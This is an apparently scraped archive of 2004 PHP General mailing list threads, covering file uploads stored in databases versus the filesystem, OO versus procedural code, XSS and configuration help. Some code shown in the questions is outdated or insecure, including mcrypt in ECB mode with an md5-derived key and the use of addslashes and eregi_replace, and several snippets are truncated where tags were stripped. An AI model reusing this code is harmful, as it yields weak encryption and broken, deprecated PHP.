> have just finished the project and you are taking it to your boss.  You
> get there and then your boss says, "you know what I would rather use
> Oracle as our database".  With this situation you have, potentially,
> wasted many hours writing the MySQL version.  What are you going to do
> now, say something like, "Sorry boss, my application I designed is not
> flexible enough for me to switch db's at this time.", as your promotion
> for completing the project goes down the drain.

If your boss switches databases at the end of the project then he's an
idiot and it should be his problem, not yours.

There are a number of database abstration layers out there btw  :)  We
use ADOdb.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[I l]

Yeah, with any luck at all, your binary file will corrupt itself, and then
make your entire database unreadable by anybody, even you.
really? Then my companies database should be corrupt by now...right? Haven't 
had any problems yet. Well, its only been running for 2 years now.

I l wrote:
> the best security practice is to store the jpg file or any other 
uploaded
> file in your mySql database. This way you never have to worry about
> someone
> executing php by the url like www.example.com/pic.jpg. To view the file,
> the
> user would type www.example.com/veiw.php?fileID=3425433345.
>
> You can also keep information about the file uploaded in your mysql such
> as
> IP address.
>
> I cann't really see any security problems here.

Yeah, with any luck at all, your binary file will corrupt itself, and then
make your entire database unreadable by anybody, even you.
Now *THAT'S* secure!
:-)
Secret Tip:
There is a little-known feature of an incredibly-efficient high-volume
thoroughly-tested software base that makes it very very very good at
storing  and retrieving large binary files such as JPEGs and other rich
media with very small chance of file corruption, and even less chance of
file corruption affecting other data or applications.
I'm not really sure I should tell you about this great secret feature, but
I guess I might as well...
It's called the "File System" and it's packaged with your Operating System.
:-)
Storing JPEGs in your database instead of the file system is like keeping
your groceries in the trunk of your car outside in the winter instead of
in the fridge.  It will work, but it's not really the best idea.
YMMV
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Greg Donald]

On Fri, 10 Dec 2004 10:32:30 -0800 (PST), Richard Lynch <[EMAIL PROTECTED]> 
wrote:
> What I do is not use classes.

I agree.

Some of the worst arguments for OO I've heard recently:

"OO programming lets you organize your code better."
So what you're saying is that you're not capable of organizing similar
functions into files and directories and using include() or require()
as needed?

"OO programming lets lots of developers work on the same code base
easier."
Malarkey[1].  The Linux Kernel crew gets along fine with no OO code.
Hundreds of thousands (millions?) of lines of code with thousands of
developers contributing daily.  A good revision control system is all you
need.

"Using OO programming is more efficient"
Where are your benchmarks?

Then you have scenarios where you have to come behind coders who think
they know OO, but they make poorly designed classes and end up calling
lots of functions statically like Object::foo().. which totally defeats
the purpose of objects along the way.

> At all.

And then you run into real life.  I'm working at a place right now
where they love OO programming.  We use Mojavi, PEAR, and Smarty
everywhere.  I understand OO pretty well I think, and I'm studying
the latest Mojavi framework.  Hopefully I'll be ahead of the curve
on the next project later down the road.  I don't really enjoy OO
programming and I don't think I'd ever code one of my own projects
with it, but I will go grab a PEAR module if it fits my needs. Code
re-use may be the only redeeming quality of OO programming, and
honestly I can re-use your code from a non-OO include file just as
easily.

It just doesn't make sense to instantiate objects for a script whose
total execution lifetime is less than a second or two.  The overhead
just isn't worth it.


http://www.geocities.com/tablizer/oopbad.htm


[1] ma·lar·key also ma·lar·ky   Audio pronunciation of "malarkey" ( P
)  Pronunciation Key  (m-lärk)
n. Slang

Exaggerated or foolish talk, usually intended to deceive:
"snookered by a lot of malarkey" (New Republic).


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

I l wrote:
> the best security practice is to store the jpg file or any other uploaded
> file in your mySql database. This way you never have to worry about
> someone
> executing php by the url like www.example.com/pic.jpg. To view the file,
> the
> user would type www.example.com/veiw.php?fileID=3425433345.
>
> You can also keep information about the file uploaded in your mysql such
> as
> IP address.
>
> I cann't really see any security problems here.

Yeah, with any luck at all, your binary file will corrupt itself, and then
make your entire database unreadable by anybody, even you.

Now *THAT'S* secure!

:-)

Secret Tip:

There is a little-known feature of an incredibly-efficient high-volume
thoroughly-tested software base that makes it very very very good at
storing  and retrieving large binary files such as JPEGs and other rich
media with very small chance of file corruption, and even less chance of
file corruption affecting other data or applications.

I'm not really sure I should tell you about this great secret feature, but
I guess I might as well...

It's called the "File System" and it's packaged with your Operating System.

:-)

Storing JPEGs in your database instead of the file system is like keeping
your groceries in the trunk of your car outside in the winter instead of
in the fridge.  It will work, but it's not really the best idea.

YMMV

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] How to post form-data to a host using PHP

[Yao, Minghua]

Hi,

Does anybody know how to post form-data to a host using PHP? Thanks for the 
answer.

-Minghua

Re: [PHP] Spurious newlines when requesting empty php file

[Richard Lynch]

Carl Michael Skog wrote:
> Some strange results with spurious newlines inserted in the response when
> requesting a php file has led me to investigating what happens when a
> completely empty php-file is requested.
>
> I would have thought that the response from a empty php file would also be
> empty, but, to my surprise, they consist of 3 newlines !!!
>
> The strange thing is that I observed this behaviour on two completely
> unrelated servers.
>
> Is this what can be expected or is it a result of misconfiguration ?

I just tried this with an empty PHP file, and got exactly what I expected.

A valid response with no content at all.

Please specify your software versions, and provide URLs and, as silly as
this sounds, an "ls -als empty.php" so we can see your empty PHP file.

Also check php.ini for auto_prepend_file and auto_append_file settings,
which might be tacking on blanks.

And, if you are using this as an "empty" file:
--- not quite empty file -

--
then PHP is quite right to send out the newline at the end.


- really empty file -
-

Note that some editors, under some configurations, will *ADD* a newline to
a file on the last line for historical reasons.

Re-configure your editor *now* if yours does that, our include files and
calls to http://php.net/header will drive you crazy, or you'll end up
mis-using output buffering to "solve" your non-problem.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Richard Lynch]

Matt Palermo wrote:
>  I would like to leave any HTML in there,

Do you *TRUST* the people typing the HTML to not attack your server, or
others, with cross-site scripting attacks?

If not, go re-read the manual about strip_tags, and pay particular
attention to the second, optional, argument.

> but just make sure that ending
> tags exist, so it doesn't screw up the rest of the page.  Strip tags would
> just wipe out the HTML rather than allowing it and ending it safely.

Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
your web server a source of problems not only to you, but to me as well.

Please use strip_tags to allow only the tags you *NEED* the users to be
able to use.

It will only take you seconds, and it will save you (and us) a lot of
grief in the long run.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Configuring PHP 5.0.2 on OpenBSD 3.6: png.h not found

[Richard Lynch]

Raymond C. Rodgers wrote:
> Having previously built PHP 4.x on OpenBSD 3.x in the past, I'm running
> into some difficulties configuring PHP 5.0.2 currently. On a fresh
> install of OpenBSD, I have confirmed installation of libpng 1.2.5p5, but
> no matter what png related switch ("--with-png-dir=" and "--with-png=")
> I use for configure, I get png.h not found.
>
> I have done a bit of searching but haven't been able to come up with any
> other similar problems... Does anyone have any idea about how to correct
> this?

Where exactly is png.h in your directory system?
If libpng is installed, it should be there.

What are you using after the --with-png-dir=
Whatever you are using, it must be a directory far enough *above* png.h to
encompass not only '/include/*/png.h' but also '/lib/*/*png*.so/
Many beginners mistakenly pass in the directory that contains 'png.h' --
Alas, PHP *also* needs to find all the png library binary files (.so) in
order to pull them in.
So starting at png.h, work your way 'up' until you hit a directory that
also has *png*.so down inside it somewhere (perhaps one or two levels
deep) and pass *that* directory with --with-png-dir=



-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Friendly URL

[Bruno B B Magalhães]

Hi guys,
As part of my framework I have a URI decoder so it explode, remove  
unnecessary data (as GET query) amd put it into an array...

Is there any better way of doing this (faster?), just wondering.
if(isset($_SERVER['REQUEST_URI']) === true)
{
$path = explode('/',$_SERVER['SCRIPT_NAME']);

$total_paths = count($path);
$path = 
stristr($_SERVER['REQUEST_URI'],$path[$total_paths-1]);
			$path = explode('/',$path);
			
			$total_paths = count($path);
			
			$i = 0;
			
			for($i=0;$i<$total_paths;$i++)
			{
$get_string = false;

$get_string = stristr($path[$i],'?');

if($get_string)
{
	$get_string = "\\".$get_string;
	$this->uri[$i] =  
strtolower(addslashes(strip_tags(eregi_replace($get_string,'',$path[$i]) 
)));
}
else
{
	$this->uri[$i] = strtolower(addslashes(strip_tags($path[$i])));
}
			}
		}

Regards,
Bruno B B Magalhaes
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[rogerk]

Quoting I l <[EMAIL PROTECTED]>:
> So, you would prefer storing the uploaded file in your directory than a
> database? Have you tried either method?

And, by the way, once you upload it into a database, it's not a file.  It's just
a data field.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[rogerk]

Quoting I l <[EMAIL PROTECTED]>:

> I never said that this method wouldn't cause you overhead. With all respect,
> I am simply stating that this method is much simpler. Sometimes you must
> choose simplicity over processing costs. What if there was another
> programmer editing your code? Or, you came back to the same code after one
> year? You better make sure that it is documented well.

I'm not argiung that programming simplicity and efficiency should be sacrificed
to system efficiency.  I'm arguiing that your perspective is one that assumes
that files will only ever be touched by a PHP application doing database
queries.

I believe file system interactions -- especially in a domain where files may be
used by different applications -- are better understood and better known than
they are database interactions.

> So, you would prefer storing the uploaded file in your directory than a
> database? Have you tried either method?

Yes, of course.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[Richard Lynch]

KJ wrote:
>>
>> Basically this particular case boils down to: "files that are included
>> and
>> should not a be called directly" should not be allowed to be called
>> directly.
>>
>> You can do this at the application level whereby each included file
>> checks
>> whether it was called directly and refuse to run when that is so.
>>
>> Or you can do this on a system level and tell your webserver not to
>> allow
>> access to particular files or directories.
>
> Yes, you could do either of the above.
>
> I don't have an issue with solutions that PHP (or Apache) provide for
> avoiding this problem. I DO have an issue with the fact that this
> problem is caused by a single "feature" is probably not used by many and
> should be able to be turned off, much like register globals.
>
> Forget possible solutions and work arounds for one moment; when I
> download and install a popular application, I don't go through every bit
> of source code to check if these workarounds have been applied. I would
> much rather set a allow_url_include flag to "off", and not have to worry
> about that. There are plenty of things you need to worry about when
> hosting, and this would create one less.

Call me silly, but...

If you don't check the source code, and you think they might be using
include "http://";...

What's the difference between that and not checking all the zillion things
your customers might do that's about 100 X as stupid?

Seems to me you're expending a fair amount of 'worry' over something that,
given that you're not checking their source in the first place, is kind of
meaningless...

Not that I'm suggesting that you *SHOULD* be checking their source -- Only
that the risk you take as part and parcel of your business is untrusted
users putting code on your machine.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] PHP4 mysqli with mysql 4.1.7?

[Richard Lynch]

Francis Mak wrote:
>> What happens in your application if you just do:
>>
>> mysql_query("SET CHARACTER SET utf8", $connection) or
>> die(mysql_error());
>>
>> right after you connect to the database?
>
> Thank you, by adding mysql_query("SET CHARACTER SET utf8", $connection),
> it
> works now.  However, I am still confused on some issue:
>
> 1. Is it possible to set the PHP mysql client to use utf8 as default?  In
> this way, I do not need to modify all of my applications.

No idea.

But you could move this query to right after the mysql_connect() line in
your applicationsk, which should really be a very limited number of
places.

> 2. Why mysqli + 4.1.x is recommended?

I haven't the foggiest idea on this one.  Hell, I don't even know what
mysqli *IS* for that matter...

I'm getting old and can't keep up with these whippersnapper PHP Developers
any more :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[rogerk]

Quoting I l <[EMAIL PROTECTED]>:

> Lets say you want to store someones picture.
>
> In the database, you would insert the picture, who owns that picture, maybe
> the ip address and request headers of where that picture came from, the
> category, sub-category, sub-sub-category in which the picture belongs to,
> etc. You can gather and store as much information about that picture as you
> want with ease.
>
> When you want to access that file and its attributes, you only have to do
> one database query.

...which decomposes to multiple file system accesses.

> Wouldn't you agree that this structure is much easier to manage than storing
> the file in a directory, then storing that extra information in a database?
> Then to retrieve, you must do a database query and find the file in the
> FILESYSTEM (hoping it is still there). The code is much more complex

First, I'm probably doing more system work to access the file contents as part
of a database record, since the attributes of that superblobby field are
different from those of the short metadata describing it.

Second, I'm forcing EVERY access to that picture, even the ones by standalone
non-webbish utilities that don't care about the metadata at all, to use a
heavyweight database engine instead of the filesystem code embedded in the
operating system... which gets used by the DBMS anyway, but less efficiently.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[I l]

I never said that this method wouldn't cause you overhead. With all respect, 
I am simply stating that this method is much simpler. Sometimes you must 
choose simplicity over processing costs. What if there was another 
programmer editing your code? Or, you came back to the same code after one 
year? You better make sure that it is documented well.

So, you would prefer storing the uploaded file in your directory than a 
database? Have you tried either method?

> Lets say you want to store someones picture.
>
> In the database, you would insert the picture, who owns that picture, 
maybe
> the ip address and request headers of where that picture came from, the
> category, sub-category, sub-sub-category in which the picture belongs 
to,
> etc. You can gather and store as much information about that picture as 
you
> want with ease.
>
> When you want to access that file and its attributes, you only have to 
do
> one database query.

...which decomposes to multiple file system accesses.
> Wouldn't you agree that this structure is much easier to manage than 
storing
> the file in a directory, then storing that extra information in a 
database?
> Then to retrieve, you must do a database query and find the file in the
> FILESYSTEM (hoping it is still there). The code is much more complex

First, I'm probably doing more system work to access the file contents as 
part
of a database record, since the attributes of that superblobby field are
different from those of the short metadata describing it.

Second, I'm forcing EVERY access to that picture, even the ones by 
standalone
non-webbish utilities that don't care about the metadata at all, to use a
heavyweight database engine instead of the filesystem code embedded in the
operating system... which gets used by the DBMS anyway, but less 
efficiently.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Removing a return character

[Richard Lynch]

Shaun wrote:
> I have a system that scans through a CSV File and inserts each row into a
> database. I have just noticed that some rows have a return character in
> them - a small square - and this is causing errors in the mysql query.
>
> Does anyone know how I can remove such chracters?

Might I point out that if those 'return' characters are in your content,
you may not want to get rid of them at all, as they could indicate
paragraphs...

I don't know how you can convince MySQL to keep them or fix your code to
present the correct data from the CSV file, but throwing out the paragraph
markers in your content is probably not a Good Idea if there is any kind
of significant amount of content involved.

Progammer's Motto:
Been there; done that; had to re-do it.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Confused - $GLOBALS

[Richard Lynch]

>> I always forget, because they changed it around on POST/GLOBALS/etc at
>> some point, but only on some of them.  Grrr.
>
> The built-in arrays with names beginning $_ are "superglobals", i.e.
> always
> global anyway.  The only other "superglobal" is $GLOBALS, which is a
> anming
> exception because it existed long before the $_ arrays came into
> existence.
> This has not changed at any point in the life of PHP -- the only change
> was
> the actual introduction of the $_ versions.

Allow me to be more precise.

In version 4.1.0 of December 2001's change log, we find this entry:

"Introduced $_GET, $_POST, $_COOKIE, $_SERVER and $_ENV variables, which
deprecate the old $HTTP_*_VARS arrays. In addition to be much shorter to
type - these variables are also available regardless of the scope, and
there's no need to import them using the 'global' statement. (Andi &
Zeev)"

Therefore my prepetual confusion about which thingies are superglobals
comes from the old $HTTP_*_VARS arrays, which are not superglobals, and
their $_* vars which have the same data, but are superglobals, and the
$GLOBALS variable, which has always been a superglobal.

So when I was supposed to go convert all my $HTTP_*_VARS, I *also* had to
get rid of all the places I used to have to make them global, but now I
don't any more...  Woof.  Can't just global search and replace my source
code, can I?

Now I know why I'm making that change piece-meal. :-^

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[John Nichel]

I l wrote:
Lets say you want to store someones picture.
In the database, you would insert the picture, who owns that picture, 
maybe the ip address and request headers of where that picture came 
from, the category, sub-category, sub-sub-category in which the picture 
belongs to, etc. You can gather and store as much information about that 
picture as you want with ease.
I can store all this information in a db without storing the binary 
image in the table too.

When you want to access that file and its attributes, you only have to 
do one database query.
I would have to do one query to get the attributes regardless if the 
image itself was in the db or the filesystem.

Wouldn't you agree that this structure is much easier to manage than 
storing the file in a directory, then storing that extra information in 
a database? Then to retrieve, you must do a database query and find the 
file in the FILESYSTEM (hoping it is still there). The code is much more 
complex
One if statement...if ( file_exists (...) ); Complex?  Not at all.  You 
should be checking it regardless if the image is in the db or not...yes, 
an image could be deleted off of the filesystem, and it could be deleted 
out of the db too.  Binary data in the db could become corrupt.  All 
kinds of things can happen.  Just assuming that you don't have to check 
your data just because it's coming from a db isn't less complex, it's 
lazy, and asking for problems.

In the end, it boils down to personal preference, but the filesystem is 
still better suited to store binary data than a db.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[I l]

Lets say you want to store someones picture.
In the database, you would insert the picture, who owns that picture, maybe 
the ip address and request headers of where that picture came from, the 
category, sub-category, sub-sub-category in which the picture belongs to, 
etc. You can gather and store as much information about that picture as you 
want with ease.

When you want to access that file and its attributes, you only have to do 
one database query.

Wouldn't you agree that this structure is much easier to manage than storing 
the file in a directory, then storing that extra information in a database? 
Then to retrieve, you must do a database query and find the file in the 
FILESYSTEM (hoping it is still there). The code is much more complex

> And finally, file management is much much easier when you store the 
files in
> a database.

There is a kind of database that is perfectly designed and equipped to 
store
files, and their very specific metadata properties, optimized for the 
correct
sort of access.

That kind of database is called a FILE SYSTEM.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: Why it doesnt work

[Richard Lynch]

M. Sokolewicz wrote:
>> Hi ive tried this script and it doesnt seem to work for me. I have typed
>> exactly the same username and password in the script..it keeps on asking
>> for
>> the username and password..pls help...cud this be due to a setting in
>> the
>> php or apache server...am using php 4.3 and apache 1.3.33...the code is
>>
>> >
>>  if (!isset($PHP_AUTH_USER)) {

If you are using PHP with the CGI SAPI, and not as a Module, then HTTP
Authentication WILL NOT WORK.

You can check this with http://php.net/php_sapi_name or, more generally,
http://phpinfo

You also may might to use $_SERVER['PHP_AUTH_USER'] if register_globals is
"OFF" as it should be.

PS  You may want to change your code structure so the block that sends the
headers out isn't repeated.  It makes it rather cumbersome as you have it
now...

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] encrypt/decrypt sqlite data

[Shawn McKenzie]

This is my first adventure with mcrypt and also the sqlite stuff.
Via file upload I am getting a SQL dump file and running it as a query
to insert data into a sqlite db.  This works great.
Then I am trying to use an update query to encrypt fields in all rows by
using the sqlite_create_function to run my encryption function that uses 
$_SESSION['key'] which is an md5 hash of a pass phrase):

$db = sqlite_open("db");  
sqlite_create_function($db, 'enc', 'encrypt', 1);

$sql  = 'UPDATE mytable SET f1=enc(f1);'
.'UPDATE results SET f2=enc(f2);';
sqlite_query($db, $sql);
function encrypt($txt)
{
$key = $_SESSION['key'];
$txt = trim($txt);

$iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

$black = mcrypt_encrypt(MCRYPT_CAST_256, $key, $txt, MCRYPT_MODE_ECB, 
$iv);

return $black;
}
Then to test, I query the db and run each field of data thru a decrypt
function before displaying it:
$db = sqlite_open("db");
$sql = "SELECT * from mytable";
$row = sqlite_array_query($db, $sql);

echo "";
foreach ($row as $k => $v) {
echo ""
."".decrypt($v['f1'])." "
."".decrypt($v['f2'])." "
."";
}
echo "";
function decrypt($black)
{
$key = $_SESSION['key'];

$iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

$txt = mcrypt_decrypt(MCRYPT_CAST_256, $key, $black, MCRYPT_MODE_ECB, 
$iv);

return $txt;
}
The problem is that the data that is displayed is not the original data.
 Some fields seem to be truncated and some seem to be mostly decrypted
except for the last line or so.  For the fields f1 and f2 I have tried
text and blob.  The actually data is either one word of text or free 
flow text with line feeds.

TIA,
Shawn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Stuart Felenstein]

--- Jason Wong <[EMAIL PROTECTED]> wrote:

> > Nothing is printing out on $_POST['var'] or $var
> > s makes sense.
> 
> Now why are you looking in $_POST for your form
> values? They're in $_GET. You 
> said earlier that you understood POST and GET?

I made the correction , using $_GET now.  Values are
printing out, aside from the select lists (arrays)
which print out as "array".

Now I can get the correct values into the text fields,
so they are working, but the drop downs and the select
lists are not.   

I'm not sure, if I need to parse the
(Server(QueryString) or implode the arrays ?This is
the big question for me.

Here is all the relevant code. Perhaps someone can see
what it is I'm doing wrong:

?>



'.$row['CareerCategories'].'';


'.$row['States'].'


'.$row['TaxTerm'].'';





Please Select
'.$row['Days'].'';

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] File upload problems using Apache 1.3 on Debian stable

[Richard Lynch]

[EMAIL PROTECTED] wrote:
> Hi,
> I have been having problems trying to get file uploads working with
> PHP in a Debian Linux enviroment. I have ensured that both the temporary
> directory PHP uploads use has the appropriate permissions set, as well
> as the folder I am attempting to copy the images into.
>
> When I called phpinfo() from the page that the upload script is on it
> shows the contents of the _FILE array as containing the appropriate
> details, however when I try and access them from within my actual code,
> the variables appear to be unset, and no files appear in either the
> temporary folder or the folder I am trying to copy the file to.
>
> Anyone have any suggestions?

Did you wrap your code up in a nice function?

Perhaps you need:
global $_FILES;
inside that function.

Or not.  Still haven't worked out which $_XXX are super-global or not in
which versions.

Maybe someday.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Apache - MySQL connection via PHP

[Mike Francis]

Hi,
I am having a problem connecting to a MySQL database via PHP.

I have Apache 2.0.52, PHP 5.0.2 and MySQL 4.1 installed and working OK 
individually.
I have copied phpmysql.dll and mysqli.dll at different times to 
Windows/System32.
I have set up a successful MyODBC connection with the database - so it exists.
I can access MySQL from the command prompt, and from a web interface with no 
problem.
However, when I run the following code I get a "Unable to connect to the 
database server at this time." error message.
If some kind soul could point me in the right direction I would be very 
grateful!!
This is the code:
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
http://www.w3.org/1999/xhtml";>


Our List of Jokes




 Unable to connect to the ' .
 'database server at this time.');
 }
 // Select the jokes database
 if ([EMAIL PROTECTED]('ijdb')) {
 exit('Unable to locate the joke ' .
 'database at this time.');
 }
 ?>
Here are all the jokes in our database:

 Error performing query: ' . mysql_error() . '');
 }
 // Display the text of each joke in a paragraph
 while ($row = mysql_fetch_array($result)) {
 echo '' . $row['joketext'] . '';
 }
 ?>

Re: [PHP] Re: PHP Security

[rogerk]

Quoting I l <[EMAIL PROTECTED]>:
> And finally, file management is much much easier when you store the files in
> a database.

There is a kind of database that is perfectly designed and equipped to store
files, and their very specific metadata properties, optimized for the correct
sort of access.

That kind of database is called a FILE SYSTEM.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[I l]

I agree with the fact that apache is very secure. I also agree with you that 
you shouldn't be 100% comfortable with apache security because there is 
always a chance of a security flaw.

But, how many beginner and intermediate PHP developers really know how to 
configure Apache for optimal security? And how many of those even have 
access to the Apache configurations? How many of those don't keep upto date 
with Apache updates and upgrades? As you probably know, it isn't apache or 
php that is insecure, it is the programmers ignorance that causes problems.

I am suggesting that a PHP programmer should write a script to store the 
files in a database because they will have absolute control over file 
storage. Although they might now be so confident with thier apache 
configurations, they should be more confident with thier own code. Since 
this script will be simple to write and have only three operations 
(uploading, downloading, checkfile), security flaws will be easier to spot. 
Therefor a PHP programmer who doesn't really know how to securely configure 
apache would not have to worry too much about a "hacker" figuring out a way 
to upload a file and execute it on the server.

And finally, file management is much much easier when you store the files in 
a database.

From: Chris Shiflett <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: I l <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security
Date: Thu, 9 Dec 2004 18:38:49 -0800 (PST)
MIME-Version: 1.0
Received: from pb1.pair.com ([216.92.131.4]) by mc8-f13.hotmail.com with 
Microsoft SMTPSVC(5.0.2195.6824); Thu, 9 Dec 2004 18:42:23 -0800
Received: (qmail 24556 invoked by uid 1010); 10 Dec 2004 02:38:54 -
Received: (qmail 24461 invoked by uid 1010); 10 Dec 2004 02:38:54 -
X-Message-Info: JGTYoYF78jF3H/0o7K18tM9GRjbrgnXY
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Precedence: bulk
list-help: 
list-unsubscribe: 
list-post: 
Delivered-To: mailing list [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-RocketYMMF: catfishhacker
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 10 Dec 2004 02:42:23.0070 (UTC) 
FILETIME=[E05E7FE0:01C4DE61]

--- I l <[EMAIL PROTECTED]> wrote:
> the best security practice is to store the jpg file or any other
> uploaded file in your mySql database. This way you never have
> to worry about someone executing php by the url like
> www.example.com/pic.jpg. To view the file, the user would type
> www.example.com/veiw.php?fileID=3425433345.
That's the best? :-)
While I have a great deal of confidence in my code as well, I find it odd
that you trust your own PHP code more than something like Apache, which
has been tested by millions of people worldwide and is very mature.
I would argue that it's more likely that you'll make a mistake in view.php
than it is that you will misconfigure Apache to process images as PHP.
Security is all about knowing what you can trust and what you cannot. A
mistrust of everything (paranoid security) is not a good solution, and
when there is a choice, the one with less risk is more secure. In this
case, I don't agree with your decision. I would put my trust in Apache.
> I cann't really see any security problems here.
There are security concerns with everything, even if they're hypothetical
(e.g., even when you can't discover an exploit). Be careful not to ever
get too comfortable. :-)
Chris
=
Chris Shiflett - http://shiflett.org/
PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Richard Lynch]

> What are some of the things you guys do to get around the
> fact that classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an OO
proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots of
the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such as
include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inheret a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it nicely,
and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is [bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritence is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or just
plain old one-line PHP rather than 20 lines of a 'class' that does nothing
much.

I find myself digging through 5 files to un-wrap something that turns out
to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody to
use OO, no matter how inappropriate OO might be for the task at hand, or
how inexperienced the lead developer.

In a crude analogy, this would be like forcing every contruction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to build
a sensible framework, leveraging the common behaviours and properties of
similar code -- or, more rarely but often more spectacular, what seems
like DIS-similar behaviours and properties that, with a shift in
view-point, turn out to be "the same"

Alas, what seems to be "de reguire" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for its
benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] user password managment

[Josh Howe]

 

Does anybody have any tips or links for creating a system for managing
user's passwords. I want to make it so that when a user is created, an
email is sent with a link that allows them to set their password. The
